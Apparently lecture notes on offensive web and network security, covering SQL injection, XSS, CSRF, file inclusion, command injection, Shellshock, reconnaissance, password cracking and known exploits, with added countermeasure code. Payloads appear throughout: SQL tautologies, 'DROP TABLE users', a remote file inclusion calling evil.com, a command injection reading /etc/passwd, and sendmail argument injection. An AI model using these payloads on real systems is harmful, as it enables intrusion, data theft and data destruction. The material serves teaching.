
Index

Web attacks

SQL Injection

Sinks (Where to Inject)

Target (What Can be Done by Injection)

SQLi: Tautologies

Tautologies are statements that are always true. They can be used as a tool for SQL injection; the most common uses are authentication bypass and dumping all the records contained in a certain table.

Comments in SQL:
-- is a standard SQL comment.
# is a MySQL comment.

Some examples:

#1 Input: "' OR '1'='1"
Note: if mysql_escape_string() is used, the quotes are escaped with a backslash "\", like this: \' OR \'\'=\'
#2 Input: "' OR 1=1 # "
#3 Input: "' OR user LIKE '%' #"
#4 Input: "' OR 1 #"
#5 Input: ' OR 'vulnerability'>'server'
Note: Bypass IDS by diverging from the more obvious tautologies

SQLi: String SQLi vs. Numeric SQLi

If you are exploiting numeric SQLi, be aware of quoting: numeric values are not quoted, so the injected input needs no quote either.

SELECT * 
FROM user_data
WHERE Login_Count = 1
AND userid = 1 OR 1 = 1

SQLi: Union query

The UNION operator is used to combine the result-set of two or more SELECT statements.

It is important to note that:

As an exception, in the MySQL database if the types do not match, a cast is performed automatically.

We can use this to detect the number of columns in the table.

Input: "' union SELECT 1,1,1,1--"
SELECT * FROM users where username='' union SELECT 1,1,1,1--'
Note: if the table has 4 columns there is no error; otherwise an exception is thrown.

SQLi: 2nd Order Injection

2nd Order Injection occurs when a malicious input value is saved in the database and, afterwards, a new query is composed using the malicious value stored in the database.

First Input: username="admin'--"
UPDATE users SET pass='new password' WHERE user='admin'--'

SQLi: Piggy-backed/Chained

Multiple commands are executed.

Be aware that SQLi piggy-backing/chaining may not work, depending on the method/function used to perform the query.

Input: "'; DROP TABLE users -- "
SELECT id FROM users 
WHERE user=''; 
DROP TABLE users -- ' AND pass=''

MYSQLi: Information Schema

See more at https://websec.ca/kb/sql_injection

SQLi: Blind SQLi

Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response.

Common Expression Used in Exploitation

It is also common to see this using time-based techniques.

MYSQLi: File Based Technique

MySQL offers functions for reading files and for writing query results to files.

Be aware of:

SELECT LOAD_FILE('<file path>')
SELECT <query> INTO OUTFILE '<file path>'

SQLi: Countermeasures
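Added example, not part of the original notes: a Python script using the standard-library sqlite3 module that runs the same login check two ways, with string concatenation and with a parameterised query, against a small constructed user table. The tautology and comment payloads from the "Tautologies" examples return every row (or the admin row) through the concatenated query and nothing through the parameterised one, and the numeric variant shows the same for an unquoted id, which is the "String vs. Numeric" point. Table layout, user names and function names are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with three demo users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "wonderland"), ("bob", "builder")],
    )
    return conn


def login_concat(conn, username: str, password: str) -> list:
    """Vulnerable: the input is spliced into the SQL text, so a quote in the
    input closes the string literal and whatever follows is parsed as SQL."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_param(conn, username: str, password: str) -> list:
    """Countermeasure: placeholders bind the input as data; the driver never
    parses it as SQL, so quotes, OR and -- are just characters of the value."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def find_by_id_concat(conn, user_id: str) -> list:
    """Vulnerable numeric case: the value is not quoted, so the injected
    'OR 1=1' needs no quote either."""
    sql = f"SELECT username FROM users WHERE id = {user_id}"
    return [row[0] for row in conn.execute(sql)]


def find_by_id_param(conn, user_id: str) -> list:
    """Countermeasure for the numeric case: convert to int first (anything that
    is not a number is rejected), then bind the integer."""
    try:
        uid = int(user_id)
    except ValueError:
        return []
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (uid,))]


if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "x", "' OR '1'='1"))      # tautology: all three users
    print(login_concat(db, "admin'--", "anything"))  # comment drops the password check
    print(login_param(db, "x", "' OR '1'='1"))       # []
    print(find_by_id_concat(db, "1 OR 1=1"))         # all three users
    print(find_by_id_param(db, "1 OR 1=1"))          # []
```

The two vulnerable functions are kept only to show what the payloads do to the query text; the parameterised versions are the ones to copy.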

Client Side Attacks

XSS

Reflected XSS

Stored XSS

DOM-based XSS

CSRF

  1. The attacker sends a page to the victim user.
  2. The victim opens the page in their browser, which triggers an HTTP GET request to the malicious website.
  3. The website returns an HTTP 200 response with an HTML page containing a form; the form's “action” attribute, however, points to an external website.
  4. When the user submits the form, the information is sent to the vulnerable Web server, triggering a “fake voting service”.

Countermeasures

Client-side

CSRF Token

  1. The user's browser sends an HTTP GET request to a Web server page.
  2. The Web server sends the page and embeds a randomly generated “CSRF token” in it. The CSRF token is unique to this HTTP response; any other user request would generate a new CSRF token.
  3. The user's browser sends a POST request, attaching the cookie information and the CSRF token.

In this way, the Web server has an authentication mechanism to know that the user is actually performing an operation from a Web page generated by the Web server.
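Added example, not the notes' own code: a minimal server-side implementation in Python of the three steps above. An in-memory dictionary stands in for the server's session store (an assumption for the demo); the form, the route name /vote and the session ids are constructed. A forged cross-site form carries the victim's cookie automatically but cannot know the token, so it is refused; a token is also single-use, so replaying a captured one fails.

```python
import secrets

# Constructed server-side state: session id -> set of unspent CSRF tokens
_sessions = {}


def render_form(session_id: str) -> str:
    """Step 2: the server embeds a fresh random token in the page it returns.
    Every GET produces a new token; older ones stay valid until spent."""
    token = secrets.token_urlsafe(32)
    _sessions.setdefault(session_id, set()).add(token)
    return (
        '<form method="post" action="/vote">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input type="submit" value="Vote"></form>'
    )


def extract_token(html: str) -> str:
    """Helper standing in for the browser: read the token back out of the form."""
    marker = 'name="csrf_token" value="'
    start = html.index(marker) + len(marker)
    return html[start:html.index('"', start)]


def handle_post(cookies: dict, form: dict) -> int:
    """Step 3: the browser sends the session cookie and the token.
    The cookie only proves who the user is; the token proves the form was
    generated by this server for this session."""
    session_id = cookies.get("session")
    token = form.get("csrf_token", "")
    valid = _sessions.get(session_id, set())
    # Tokens are 256-bit random values, so a guessed token is not a practical concern
    if token not in valid:
        return 403
    valid.discard(token)  # single use: a replayed token is refused
    return 200


if __name__ == "__main__":
    page = render_form("sess-A")
    tok = extract_token(page)
    print(handle_post({"session": "sess-A"}, {"csrf_token": tok}))  # 200
    print(handle_post({"session": "sess-A"}, {}))                   # 403: cookie but no token
```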

Bypass Client-Side Controls

These can be bypassed using the browser's developer tools or an interpreter.

Hidden Form Fields

<input type="hidden" name="price" value="449">

It would be sent in the HTTP request as price=449

Length Limits

<input type="text" name="quantity" maxlength="1">

Disable Elements

<input type="text" name="price" disabled="true" value="449">

Script based Validation

<form method="post" action="submit" onsubmit="return validateForm(this)">
</form>
<script>
    function validateForm(Form) {
        ...
    }
</script>
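Added example, not from the original notes: the server-side counterpart to the four controls above, in Python. The order handler ignores the client-supplied price and the disabled field, and re-does the maxlength and validateForm() checks itself, because a request can be constructed without ever rendering the page. The catalogue, the SKU values and the quantity limit are constructed for the demo.

```python
# Constructed catalogue: the server's own price list is the only source of truth
CATALOGUE = {"SKU-449": 449, "SKU-120": 120}
MAX_QUANTITY = 9  # the limit the form tried to impose with maxlength="1"


def process_order(form: dict) -> dict:
    """Re-validate everything the client-side controls were supposed to guarantee.
    'price' and any disabled field in the submitted form are never read."""
    sku = form.get("sku")
    if sku not in CATALOGUE:
        return {"ok": False, "error": "unknown product"}
    try:
        quantity = int(form.get("quantity", ""))
    except ValueError:
        return {"ok": False, "error": "quantity is not a number"}
    if not 1 <= quantity <= MAX_QUANTITY:
        return {"ok": False, "error": "quantity out of range"}
    price = CATALOGUE[sku]  # authoritative value; form.get("price") is ignored
    return {"ok": True, "total": price * quantity}


if __name__ == "__main__":
    # The edited hidden field and the oversized quantity change nothing
    print(process_order({"sku": "SKU-449", "quantity": "2", "price": "1"}))
    print(process_order({"sku": "SKU-449", "quantity": "99"}))
```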

Local/Remote File Inclusion

<?php
include $_GET['lang'];
?>
http://site.com/test?lang=/etc/passwd

http://site.com/test?lang=http://evil.com/code.txt (causing RCE)

Countermeasures

php://filter

php://filter/read=a|b/resource=f (applies filters a and b while reading f)
php://filter/write=a|b/resource=f
php://filter/a|b/resource=f (read and write)
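Added example, not part of the original notes: a Python function that resolves a ?lang= value the way a countermeasure for the include above should, with an allow-list first and a path-containment check second. The base directory /srv/app/lang and the two-letter language codes are assumptions for the demo. The separate path check is shown on its own to make one caveat visible: to a filesystem path function, http://evil.com/code.txt and php://filter/... look like ordinary relative paths, so only the allow-list rejects wrapper and remote payloads.

```python
import os
import re

LANG_DIR = "/srv/app/lang"           # assumed base directory for language files
LANG_RE = re.compile(r"^[a-z]{2}$")  # allow-list: exactly two lowercase letters


def path_stays_inside(candidate: str, base_dir: str = LANG_DIR) -> bool:
    """Path-containment check alone: normalise base/candidate and require that
    the result is still under base_dir. Catches absolute paths and ../ traversal.
    Note: a scheme such as http:// or php:// is not special to this check."""
    full = os.path.normpath(os.path.join(base_dir, candidate))
    return os.path.commonpath([base_dir, full]) == base_dir


def safe_include_path(lang: str, base_dir: str = LANG_DIR):
    """Return the file to include for ?lang=..., or None if the value is rejected.
    Defence in depth: the allow-list decides, the path check is a second guard."""
    if not LANG_RE.match(lang):
        return None
    full = os.path.normpath(os.path.join(base_dir, lang + ".php"))
    if os.path.commonpath([base_dir, full]) != base_dir:
        return None
    return full


if __name__ == "__main__":
    for value in ["en", "/etc/passwd", "../../etc/passwd",
                  "http://evil.com/code.txt",
                  "php://filter/read=convert.base64-encode/resource=index"]:
        print(f"{value!r:60} -> {safe_include_path(value)}")
```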

Command Injection

<?php
$host = $_GET['host'];
system('ping -c 4 ' . $host);
?>

http://site.com/ping.php?host=a;cat%20/etc/passwd
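Added example, not the notes' own code: the countermeasure for the ping handler above, written in Python. The host value is accepted only if it is an IP address or a syntactically valid hostname, and the command is run as an argument vector with shell=False, so no shell ever parses the value. The hostname pattern is an RFC 1123 style approximation chosen for the demo; the page's payload a;cat /etc/passwd fails the check.

```python
import ipaddress
import re
import subprocess

# One hostname label: letters, digits and hyphens, no leading or trailing hyphen
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{LABEL}\.)*{LABEL}$")


def is_valid_host(host: str) -> bool:
    """Accept an IPv4/IPv6 address or a well-formed hostname, nothing else.
    Shell metacharacters (; | & $ ` and whitespace) cannot pass this check."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(host) is not None


def build_ping_argv(host: str) -> list:
    """Build the command as an argument vector. Each element is one argv entry,
    so even a ';' in the host would reach ping as a literal character."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "4", host]


def ping(host: str) -> str:
    """Run the validated command without a shell and return its standard output."""
    result = subprocess.run(
        build_ping_argv(host), capture_output=True, text=True, shell=False
    )
    return result.stdout


if __name__ == "__main__":
    print(build_ping_argv("example.com"))
    try:
        build_ping_argv("a;cat /etc/passwd")
    except ValueError as exc:
        print(exc)
```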

Shellshock

character sequence: () { :;};

$ env x='() { :;}; echo vulnerable' bash -c "echo not-vulnerable"

Race Condition in Web Apps

Network Reconnaissance

Network Security Assessment

  1. Reconnaissance to identify networks, hosts, and users of interest
  2. Vulnerability scanning to identify potentially exploitable conditions
  3. Investigation of vulnerabilities and further probing by hand
  4. Exploitation of vulnerabilities and circumvention of security mechanisms

Phase 1: Reconnaissance

Reconnaissance explores the tactics to identify hosts, networks, and users of interest, and it can be either passive or active.

Phase 2: Vulnerability Scanning

Vulnerability scanning is usually supported by tools, and it may be useful to expose vulnerable or unpatched services running in a target network. Some of the most popular vulnerability scanning tools include:

In general, scanning is also useful for:

Phase 3: Investigation of Vulnerabilities

Vulnerabilities are found by “researchers”. They can then either be responsibly disclosed to the product vendor (so it can patch them), or sold irresponsibly to customers willing to pay for new vulnerabilities (there is a huge black market for zero-days).

The following diagram depicts an overview of how a vulnerability can pass from the private domain to the public, either via responsible disclosure or weaponization.

Phase 4: Exploitation of Vulnerabilities

There is also a plethora of tools to support the exploitation of vulnerabilities, as we will see later in the course. Some of them are Rapid7 Metasploit, CORE Impact and Immunity CANVAS. An important remark, as in the other steps of the security testing pipeline, is that humans cannot be replaced by tools: here too, tools can only exploit the easiest types of vulnerabilities, while identifying and exploiting real vulnerabilities in more complex systems may require scripting and exploit writing.

Iterative Process

Passive Reconnaissance

Querying Search Engines and Websites

The following classes of data are often uncovered by querying search engines and websites:

Querying Netcraft

The Netcraft Web Application contains historical server fingerprints, which you can use to check OS versions or map network blocks of a company.

Shodan

Shodan is a service that collects network scan results, which may reveal exposed and/or unhardened services. The Metasploit tool can optionally rely on Shodan as well.

LinkedIn

Even if it may seem to be just a social network, in practice LinkedIn (and especially LinkedIn Premium) can be used to look up people and roles without notifying them.

Domain WHOIS

The WHOIS query and response protocol contains useful public information about domain registrars (although sometimes this can be anonymized). Typically, it contains:

Automated Email Enumeration

The TheHarvester tool supports automatic search and collection of email/hosts on public search engines.

DNS Querying

By querying name servers, you may find information about registered name servers and some exposed services.

Countermeasures

Active Reconnaissance

nmap

nmap supports more than 10 types of scanning methods.

Host Scanning

The presence of an IP address in a domain zone does not necessarily imply that the IP is reachable from the Internet.
You need to verify, for each potential “target” system:

One of the first steps in reconstructing a map of the target network is the automated execution of a series of ping commands over ranges of IP addresses and network blocks, to determine which systems are active.
Known techniques:

Limitation: normally the “ping” command sends ICMP ECHO_REQUEST packets to a system, soliciting an ICMP ECHO_REPLY in return, which indicates that the system is up.

fping

fping -s -g 192.168.10.0/24

nmap

Unlike fping, the option -sP of nmap allows you to send in parallel:

Defense

Defense:

Counter-defense:

Port Scanning

Trying to connect to the TCP and UDP ports of the target system to determine which network services are running (LISTENING).
Knowing the active ports offers important knowledge that can be exploited to attack a system.

UDP Portscan

TCP Portscan

TCP SYN Scanning

TCP FIN Scanning

Idle Scanning

OS Fingerprinting

nmap -O ip_address

Service Enumeration

By grabbing the headers of exposed services, nmap (option -sV) can try to infer the exact service version

nmap

nmap -sV ip_address

Countermeasures

Reporting

Security Testing Activities

Vulnerability Assessment (VA)

Penetration Testing

It is a more sophisticated activity that goes beyond the tools:

Phases of Pentesting:

  1. Pre-engagement Interactions
  2. Intelligence Gathering
  3. Threat Modeling
  4. Vulnerability Analysis
  5. Exploitation
  6. Post Exploitation
  7. Reporting

Red Teaming

Reporting

Objectives

Quality

Anyone can:

Not everyone can understand what vulnerabilities actually mean.

To make client

Vulnerability Details

Common Mistakes

Social Engineering

Definition

Social Engineering is a psychological manipulation of people into revealing confidential/sensitive information of the organization or performing certain actions, such as:

Social Engineering relies on a set of non-technical strategies that exploit weaknesses of human psychology.

Phases

Key Principles

Reconnaissance

Victim Approach

Attack Vectors

Countermeasures

Password Cracking

Dictionary Attacks

A password of at least 8-12 characters can guarantee a good level of protection against brute-force attacks.
Unfortunately, there are other options:

There are four main elements to initially determine security of a password:

  1. Number of symbols used in the password (e.g., a 4-digit lock would require on average 5000 * 2 seconds, i.e., about 3 hours)
  2. Number of possibilities for each position (e.g., an alphabetic lock with three symbols would require 26*26*26 = 17,576 possibilities, i.e., an average of 5 hours instead of 17 minutes).
  3. Time required by every attempt (e.g., if 20 s were required instead of 2 s for every attempt, the situation would be much different, but so it would be if only 2 ms were needed for every attempt)
  4. Are there easier alternatives? Typically, an attacker does not want to leave evidence/traces, but may be forced to break the bag

Hash Function

Cryptographic Hash Functions (CHFs) are hash functions suitable for information security applications, and have the following ideal properties:

Birthday Problem

Assuming birthdays are i.i.d., with 23 people the probability that some pair shares a birthday is already 50%.

Collision Attack

Finding two inputs that generate the same hash

MD5 is a cryptographic hash function

Pre-Image Attack

Tries to find a message that has a specific hash value.

Password Cracking

Brute-Force

Trying all possible passphrase combinations by enumeration until you get the right one (e.g., you get a meaningful plaintext, you access the system)

Mitigations:

Dictionary Attack

A variant of brute-force attack for password cracking or cryptanalysis in which, instead of trying all the possible password alternatives, you try only a set of passwords from a dictionary

Examples of dictionaries:

Pre-Computing Dictionary

Rainbow Table Attack

Pre-Computed Dictionary Attacks: you can precompute the hashes of a list of dictionary words and store them in a table, so that the conversion is always known.

Space-time trade-off: rainbow tables reduce storage requirements at the cost of slightly longer lookup times.

Objective: find the plaintext password
Conditions: the rainbow table has 3 reduction functions
Step 0: the hash “re3xes” is found in /etc/shadow of the victim.
Step 1: apply R3; if the result is not a chain end, apply R2 then R3, then R1, R2, R3, until the result matches the last keyword of one of the chains (here linux23).
Step 2: start from the first keyword of that chain and recompute it until “re3xes” appears (here passwd -H-> dlcm4 -R1-> culture -H-> re3xes); therefore culture is the plaintext
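Added example, not from the original notes: a toy rainbow table in Python that follows the two steps above literally, with a truncated SHA-256 as H, three reduction functions R1, R2, R3, and chains of length 3. The password space (three lowercase letters), the start words and the reduction function are constructed for the demo and deliberately tiny; the point is the lookup order (R3, then R2 R3, then R1 R2 R3) and the fact that only chain ends are stored while the middle of a chain is recomputed, which is the space-time trade-off.

```python
import hashlib
import string

ALPHABET = string.ascii_lowercase
PW_LEN = 3     # constructed password space: 26**3 = 17,576 candidates
CHAIN_LEN = 3  # three reduction functions R1, R2, R3, as in the walkthrough


def H(password: str) -> str:
    """Toy hash: SHA-256 truncated to 6 hex digits so the demo stays small."""
    return hashlib.sha256(password.encode()).hexdigest()[:6]


def R(i: int, digest: str) -> str:
    """Reduction function R_i: maps a digest to *some* password in the space.
    It is not an inverse of H; the index i makes R1, R2 and R3 differ."""
    n = int(digest, 16) + i * 7919
    chars = []
    for _ in range(PW_LEN):
        chars.append(ALPHABET[n % 26])
        n //= 26
    return "".join(chars)


def build_chain(start: str) -> list:
    """start -H-> R1 -H-> R2 -H-> R3; returns every password on the chain."""
    chain = [start]
    for i in range(1, CHAIN_LEN + 1):
        chain.append(R(i, H(chain[-1])))
    return chain


def build_table(starts) -> dict:
    """Store only (chain end -> start words). Two chains may merge into the
    same end, so a list of starts is kept per end."""
    table = {}
    for s in starts:
        table.setdefault(build_chain(s)[-1], []).append(s)
    return table


def lookup(table: dict, target: str):
    """Step 1: assume the target hash sits just before R3; if the computed end
    is unknown, assume it sits before R2 and apply R2, R3; then R1, R2, R3.
    Step 2: on a hit, regenerate the chain from its start and return the
    password whose hash equals the target (merged-chain false alarms are skipped)."""
    for k in range(CHAIN_LEN, 0, -1):
        h = target
        end = None
        for i in range(k, CHAIN_LEN + 1):
            end = R(i, h)
            h = H(end)
        for start in table.get(end, []):
            for candidate in build_chain(start):
                if H(candidate) == target:
                    return candidate
    return None


# Constructed start words for the demo table
STARTS = ["abc", "qwe", "zxc", "pas"]
TABLE = build_table(STARTS)

if __name__ == "__main__":
    chain = build_chain("abc")
    print("chain:", " -> ".join(chain), "| stored end:", chain[-1])
    print("lookup of H(%s) = %s" % (chain[1], lookup(TABLE, H(chain[1]))))
```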

Countermeasures: Rainbow Table Attacks / Pre-Computed Dictionary

These attacks can be thwarted by the use of a salt.

Common mistakes:

Note that using a “salt” does not provide robustness against dictionary attacks, only against pre-computation.
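Added example, not the notes' own code: salted password storage in Python with a random per-user salt and PBKDF2-HMAC-SHA256 from the standard library, next to the unsalted hash a pre-computed table is built against. Two records of the same password get different salts and therefore different digests, so a table computed in advance matches neither; what the salt does not change is that each dictionary word can still be hashed with the stored salt, which is why the slow KDF (iteration count) is the other half of the countermeasure. The word list, iteration count and storage format are constructed for the demo.

```python
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 100_000  # kept modest for the demo; deployments use a higher count


def unsalted_hash(password: str) -> str:
    """What a pre-computed table targets: one fixed mapping password -> digest."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_precomputed(words) -> dict:
    """A pre-computed dictionary: digest -> word, built once, reusable for any victim."""
    return {unsalted_hash(w): w for w in words}


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Countermeasure: random per-user salt plus a slow KDF.
    The salt is stored in clear next to the digest; it is not a secret, it only
    makes every stored digest unique, so nothing computed in advance matches."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def stored_digest(stored: str) -> str:
    """The digest part of a stored record (what a table lookup would be tried on)."""
    return stored.split("$")[-1]


# Constructed word list for the pre-computed table
WORDS = ["password", "culture", "linux23", "passwd"]

if __name__ == "__main__":
    table = build_precomputed(WORDS)
    print("unsalted hit:", table.get(unsalted_hash("culture")))
    record = hash_password("culture")
    print("salted record:", record)
    print("salted hit:", table.get(stored_digest(record)))  # None
```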

Weak Passwords

Exploitation

Finding Exploits

Find

• Reliable sources (checked closely)

Always try to understand exploit code before running it

Customize

Exploits mostly do not work out of the box

Heterogeneous languages

Heartbleed

See at SSL/TLS Vulnerabilities

Dirty COW (Copy-on-Write)

Vulnerability of the Linux kernel (also affects Android <= 7)
Local privilege escalation vulnerability that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem

PHPMailer RCE

Remote code execution (RCE) vulnerability in the PHPMailer PHP e-mail library

Four main steps:

  1. PHPMailer gets the user request
  2. PHPMailer validates the user-supplied data
  3. PHPMailer passes the data to the PHP mail() function
  4. PHPMailer then calls the OS command “sendmail” (e.g., on Linux) to actually send the e-mail (of course a mail server needs to be configured on the machine to send a message), using /usr/bin/sendmail -i -t -f <sender> by default

Example of a crafted sender address that injects extra sendmail parameters:
"attacker \" -injPar1 -injPar2"@example.com

ImageTragick

ImageMagick is an image processing library often used on the Web
Multiple vulnerabilities:

  1. CVE-2016-3714 - Insufficient shell characters filtering leads to (potentially remote) code execution
  2. CVE-2016-3718 - SSRF
  3. CVE-2016-3715 - File deletion
  4. CVE-2016-3716 - File moving
  5. CVE-2016-3717 - Local file read

Metasploit

Advanced Strategies

Stealth

Persistence

Adversarial Machine Learning

5 Phases

  1. Data Collection
  2. Pre-processing and Feature Engineering
  3. Model Selection and Training
  4. Testing and Evaluation
  5. Evaluation against Time Evolution and Adversaries

Algorithm Categories

Evaluation

$TP$: True Positives
$FP$: False Positives
$TN$: True Negatives
$FN$: False Negatives

Precision: how many selected items are relevant

$\text{Precision} = \frac{TP}{TP + FP}$

Recall: how many relevant items are selected

$\text{Recall} = \frac{TP}{TP + FN}$

F1-Score:

$F_1 = 2 \cdot \frac{\text{Precision} \cdot \text{Recall}}{\text{Precision} + \text{Recall}}$

Accuracy:

$\text{Accuracy} = \frac{TP + TN}{TP + FP + TN + FN}$
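Added example, not part of the original notes: the four metrics computed in Python from constructed detector verdicts, with the zero-division cases (no predicted positives, no positives at all) handled. A second constructed set with one malicious sample in a hundred shows why accuracy alone is misleading for a detector: flagging nothing scores 99% accuracy with zero recall. Labels and sample sizes are constructed for the demo.

```python
def confusion_counts(y_true, y_pred, positive=1):
    """Count TP, FP, TN, FN for one positive class (here 1 = malicious)."""
    tp = fp = tn = fn = 0
    for truth, pred in zip(y_true, y_pred):
        if pred == positive:
            if truth == positive:
                tp += 1
            else:
                fp += 1
        elif truth == positive:
            fn += 1
        else:
            tn += 1
    return tp, fp, tn, fn


def evaluate(y_true, y_pred, positive=1) -> dict:
    """Precision, recall, F1 and accuracy from the four counts.
    Undefined ratios (0/0) are reported as 0.0 rather than raising."""
    tp, fp, tn, fn = confusion_counts(y_true, y_pred, positive)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    total = tp + fp + tn + fn
    accuracy = (tp + tn) / total if total else 0.0
    return {"TP": tp, "FP": fp, "TN": tn, "FN": fn,
            "precision": precision, "recall": recall,
            "f1": f1, "accuracy": accuracy}


# Constructed verdicts for ten samples: 1 = malicious, 0 = benign
Y_TRUE = [1, 1, 1, 1, 1, 0, 0, 0, 0, 0]
Y_PRED = [1, 1, 1, 0, 0, 1, 0, 0, 0, 0]

# Constructed imbalanced set: one malicious sample in a hundred, detector flags nothing
Y_TRUE_RARE = [1] + [0] * 99
Y_PRED_NONE = [0] * 100

if __name__ == "__main__":
    print(evaluate(Y_TRUE, Y_PRED))            # precision 0.75, recall 0.6, F1 0.667, accuracy 0.7
    print(evaluate(Y_TRUE_RARE, Y_PRED_NONE))  # accuracy 0.99 but recall 0.0
```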